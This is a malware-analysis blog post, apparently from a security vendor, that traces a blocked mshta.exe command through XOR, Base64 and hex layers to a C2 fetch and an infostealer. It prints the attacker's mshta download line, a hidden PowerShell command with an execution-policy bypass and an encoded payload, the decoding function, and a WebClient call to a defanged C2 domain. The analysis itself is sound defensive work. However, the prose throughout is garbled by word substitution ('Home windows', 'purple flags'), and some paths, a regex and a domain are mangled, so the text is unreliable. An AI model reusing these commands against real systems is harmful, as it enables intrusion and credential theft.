MSHTA Assault Evaluation: How a Blocked Command

Just lately, our workforce got here throughout an alert involving mshta.exe, a local Home windows software that attackers generally exploit for malicious functions. MSHTA (Microsoft HTML Software Host) is a widely known LOLBin (Residing-Off-The-Land Binary). This implies it’s a respectable system software that may be abused and may mix in with regular exercise. MSHTA can execute distant HTML purposes or JavaScript content material straight from a URL. Now we have seen an uptick in such a MSHTA exercise, with 6 true optimistic incidents in Q2 in comparison with the 1 in Q1 in 2025. When it seems in logs reaching out to suspicious URLs, it deserves rapid consideration.

On this case, we acquired an alarm for a excessive severity detection leveraging MSHTA. Whereas the preliminary try was in the end mitigated, that means the payload didn’t full execution, it nonetheless served as a precious place to begin for a deeper investigation. Even when a malicious file or script doesn’t execute absolutely, the breadcrumbs it leaves behind can nonetheless reveal the attacker’s intent, infrastructure, and tooling. On this article, we are going to focus on the next:

• The preliminary command that triggered the alarm
• The obfuscated content material we discovered embedded inside
• Why XOR decoding was related and the way it labored
• The step-by-step decoding journey, from VBScript to PowerShell to remaining payload
• Why every stage mattered from an investigative standpoint
• The kinds of actionable intelligence we uncovered alongside the best way

On this real-world instance, a single blocked command line led to a full malware chain involving LOLBins, obfuscation, PowerShell payloads, and infostealer malware. By dissecting every stage of the assault, we are able to use artifacts discovered to raised tune detections, block infrastructure proactively, and enhance our response playbooks, even when the rapid risk was mitigated.

The Preliminary Alert

Fig 1. Preliminary Alert

The command line from the alert was:

“C:WINDOWSsystem32mshta.exe” hxxps[://]sync-buffer-data[.]oss-ap-southeast-1[.]aliyuncs[.]com/session_update[.]tmp; Entry Guard: Ref: 45ab26cf05b6abc95f314d47cf750f

Instantly, this command raises a number of purple flags. Menace actors typically make use of this tactic to realize preliminary entry or execute a script with out dropping an precise file to disk. As a result of it’s a Home windows system utility, this makes it simpler to evade primary signature-based detections and utility whitelisting options.

On this occasion, MSHTA was reaching out to a website hosted on Alibaba Cloud Object Storage, a respectable cloud service typically repurposed by attackers to host malware below the guise of harmless-looking recordsdata. The file being pulled was named “session_update.tmp”, a generic title meant to keep away from suspicion. Whereas .tmp recordsdata can be utilized innocuously by purposes, they’re additionally generally abused in malware supply chains to masks the true nature of a payload.

Given the potential severity and stealth of this habits, our subsequent step was to soundly examine the contents of “session_update.tmp”. To do that, we accessed the URL from inside a sandboxed setting and captured the file for additional static evaluation.

The Suspicious Payload

In a sandboxed setting, the “session_update.tmp” file was downloaded and inspected. At first look, it could have regarded benign. The header learn:

ISO Media file produced by Google Inc. Created on: 09/15/2024

Fig 2. Header present in authentic session_update.tmp

This can be a textbook instance of masquerading, a tactic the place malicious content material is disguised as one thing benign to evade detection or mislead analysts. On this case, the attacker mimicked a media file format, doubtless hoping to keep away from scrutiny from each detection programs and human assessment.

Regardless of its header, the file was fairly massive (3,421 KB), with over 67,000 traces and roughly 3.4 million characters. This seemed to be a deliberate try to bury the malicious script in noise, making it more durable to determine suspicious patterns. This can be a widespread obfuscation technique used to overwhelm analysts or trigger timeouts in automated scanners, forcing a deeper guide investigation to search out the precise payload hidden inside the litter.

The subsequent step was to peel again these layers to extract any embedded scripts or suspicious logic hid beneath the noise.

CyberChef: Discovering the Worth within the Noise

To start making sense of the file, we turned to CyberChef, which is an open-source software for parsing and reworking knowledge. After copying the complete contents of “session_update.tmp” and pasting it into CyberChef, we used the “Discover / Substitute” operation to strip out non-human-readable characters. This helped scale back the noise and focus in on significant strings.

The common expression we used was:

[^A-Za-z0-9.,!?'”()[]:;_-]

This regex targets and removes any character that isn’t widespread alphanumeric or punctuation, abandoning solely code, instructions, and readable textual content. By filtering the file this manner, we lowered tens of millions of characters into one thing far more manageable.

Fig 3. Utilizing regex in CyberChef to take away non-human-readable characters

Obfuscation: XOR with 0xFF

With our new, trimmed-down textual content, we have been lastly capable of begin trying to find something resembling script content material. Two issues stood out within the cleaned file: a block of obfuscated VBScript, and a very revealing operate that hinted at how the encoding could possibly be reversed:

Fig 4. Suspicious script discovered buried inside our doc

Fig 5. Enlightening line of code discovered to assist us decide de-obfuscation steps

Related operate calls that caught our consideration:

scriptfunctionoigK(kghOD)for(vareIYxu”,cUpB0;cUpBkghOD.size;cUpB2)varvparseInt(kghOD.substr(cUpB,2),16);eIYxuString.fromCharCode(255-v);returneIYxu;

This operate performs the next:

• Parses the enter hex string two characters at a time
• Converts every pair into an integer utilizing parseInt()
• Subtracts the end result from 255 (Alternatively performs an XOR with 0xFF)
• Converts the end result into an ASCII character utilizing String.fromCharCode()

Be aware: Why XOR with 0xFF? XOR’ing a byte with 0xFF (which is 255 in decimal or 11111111 in binary) inverts all its bits. For instance, if a byte is 01010101 and also you XOR it with 11111111, the result’s 10101010 which is a full inversion. Mathematically, this has the identical impact as subtracting the unique byte worth from 255, which is what makes 255 – v (from script) and v XOR 0xFF equal on this case.

After figuring out this logic, we have been capable of reconstruct the decoding steps in CyberChef utilizing a mix of “From Hex” adopted by XOR with a key of 0xFF (255). This transformation instantly yielded a extra legible chunk of script, our subsequent payload:

Fig 6. Utilizing From Hex adopted by XOR with a key of 0xFF (255) in CyberChef to de-obfuscate code

From VBScript to PowerShell to C2

After utilizing decoding logic, we uncovered a brand new, extra readable payload. As seen within the CyberChef output in Fig 5., this payload invoked powershell.exe via Home windows Administration Instrumentation (WMI) utilizing VBScript’s GetObject(“winmgmts:”) and Create(“powershell.exe”) strategies:

powershell.exe -w hidden -nop -ep bypass -e [Base64Payload]

This command tells PowerShell to execute in hidden mode (-w hidden), with out loading a profile (-nop), with execution coverage bypassed (-ep bypass), and to decode and execute the provided Base64-encoded script (-e).

The subsequent stage was to decode this Base64 payload, which we additionally carried out in CyberChef utilizing the “From Base64” operation. This revealed one other layer of obfuscation – a PowerShell script that additional remodeled knowledge by splitting a hex-encoded string and changing it to characters. This was achieved with the next command:

-split ‘(?

Fig 7. Utilizing From Base64 in CyberChef to de-obfuscate code

In brief, this decoding logic does the next:

• Splits the string into 2-character chunks utilizing regex lookbehind.
• Converts every 2-character chunk from hex to its decimal equal utilizing ToInt32($_,16).
• Casts the end result into ASCII characters utilizing [char].
• Joins all ensuing characters again collectively right into a readable script or command.

This layering reveals how attackers use a number of easy transformations to delay detection and evaluation. By combining VBScript with WMI and PowerShell, the attacker averted dropping conventional executables and as a substitute chained collectively native system utilities which is a standard Residing-Off-The-Land tactic.

Last Stage: From Hex to Command & Management

After decoding the earlier Base64 PowerShell payload, we uncovered yet one more layer of obfuscation: a hex-encoded PowerShell script, which we decoded utilizing the “From Hex” operation in CyberChef.

Fig 8. Utilizing From Hex in CyberChef to de-obfuscate code

The decoded script units up a WebClient object and constructs a follow-up command to fetch distant content material from the URL:

hxxp://w[.]cylinderacronym[.]high/wdgts_conf.json

This is a sign of a command-and-control (C2) callback. The malware is now reaching out to fetch its remaining directions or further payload elements from a malicious server.

What makes this significantly attention-grabbing is the extent of obfuscation seen within the remaining payload hosted at “wdgts_conf.json”. As seen within the browser screenshot beneath, the contents of the file are closely obfuscated utilizing randomized variable names, character manipulation, and arithmetic-based encoding:

Fig 9. Extremely obfuscated payload inside wdgts_conf.json

Every line seems to carry out arithmetic operations on character values, a standard method in JavaScript malware or PowerShell loaders to keep away from direct use of strings. This layer is probably going designed to reconstruct one other script in reminiscence, making detection by static scanners far more troublesome. At this level, guide evaluation turns into extra time-consuming and fewer environment friendly. Whereas we may step via and decode the logic line by line, that is the place sandbox evaluation instruments develop into invaluable for simulating execution and extracting runtime habits with out the necessity to unpack each single line by hand.

What Occurred Subsequent

As soon as we had remoted the ultimate stage payload, we submitted it to Joe Sandbox, an automatic malware evaluation platform. This executed the complete malware chain in a managed setting and produced a complete report with high-confidence outcomes:

Fig 10. Screenshot of Joe Sandbox report

Joe Sandbox uncovered a variety of suspicious and malicious habits, together with:

• Suricata IDS alerts triggered by identified malicious community site visitors

• Bypassing PowerShell execution insurance policies, enabling the script to run unrestricted

• {Hardware} and BIOS interrogation, generally used for digital machine detection or sandbox evasion

• Credential harvesting, concentrating on:

• Browsers (saved passwords, session knowledge)
• FTP purchasers
• Saved Home windows credentials

• Cryptocurrency pockets concentrating on, a trademark of contemporary stealer malware

• Costura Meeting Loader detection, suggesting the usage of a custom-packed executable to bundle malicious elements and evade static detection

• Persistence mechanisms, which permit the malware to outlive system reboots and preserve long-term entry

The Last Payload: Stealer Malware

Based mostly on evaluation in Joe Sandbox, the ultimate payload fetched from w[.]cylinderacronym[.]high was a extremely succesful data stealer. Its performance included:

• Browser knowledge exfiltration, together with saved credentials and historical past
• FTP and e mail credential theft, probably enabling lateral motion or additional compromise
• Cryptocurrency pockets theft, doubtless concentrating on pockets.dat recordsdata and browser-based wallets
• Potential password supervisor concentrating on, based mostly on registry and course of exercise
• Anti-analysis methods, together with VM consciousness and sandbox evasion to keep away from detection in automated environments

Collectively, these behaviors point out it is a subtle infostealer constructed for silent knowledge harvesting and long-term compromise. That is the type of malware that may stay hidden for weeks or months if not caught early.

Classes Realized

On the planet of incident response, it’s straightforward to cease as soon as a malicious indicator is confirmed, particularly if the exercise was efficiently blocked or mitigated. However as we have now simply demonstrated, following the complete execution chain can uncover the broader scope and true aims of an assault.

What began as a easy MSHTA command line developed right into a full investigation, revealing a multi-layered malware supply system and a remaining payload able to exfiltrating delicate knowledge.

This investigation strengthened a number of key takeaways:

• Obfuscation methods are layered and deliberate, together with XOR encoding, hex transformation, and base64, every designed to evade detection and exhaust evaluation makes an attempt.
• Residing-off-the-land binaries (LOLBins) like mshta.exe, powershell.exe, and WMI stay important instruments for attackers in early-stage supply attributable to their trusted standing and deep system integration.
• CyberChef proved invaluable, permitting fast and clear transformations that made sense of in any other case unreadable knowledge. Its flexibility as a decoding and deobfuscation software makes it essential for any responder or researcher.
• Automated sandboxing instruments like Joe Sandbox crammed crucial gaps. When time or complexity turns into a barrier to guide decoding, these platforms reveal real-world habits and floor IOCs, TTPs, and potential.

Last Ideas

You don’t must de-obfuscate each script manually however doing this will sharpen your instinct and show you how to develop extra fluent in attacker techniques. Over time, you’ll discover patterns: reused features, acquainted encoding methods, and telltale behaviors that speed up your evaluation and response.

Studying to identify these techniques, from intelligent regex evasion to XOR-based decoding, isn’t nearly fixing as we speak’s alert. It’s about making ready for tomorrow’s assault. While you perceive how attackers suppose, you’ll be able to detect threats sooner, reply smarter, and strengthen your defenses earlier than the following payload even lands.

The content material supplied herein is for common informational functions solely and shouldn’t be construed as authorized, regulatory, compliance, or cybersecurity recommendation. Organizations ought to seek the advice of their very own authorized, compliance, or cybersecurity professionals relating to particular obligations and danger administration methods. Whereas LevelBlue’s Managed Menace Detection and Response options are designed to help risk detection and response on the endpoint stage, they aren’t an alternative choice to complete community monitoring, vulnerability administration, or a full cybersecurity program.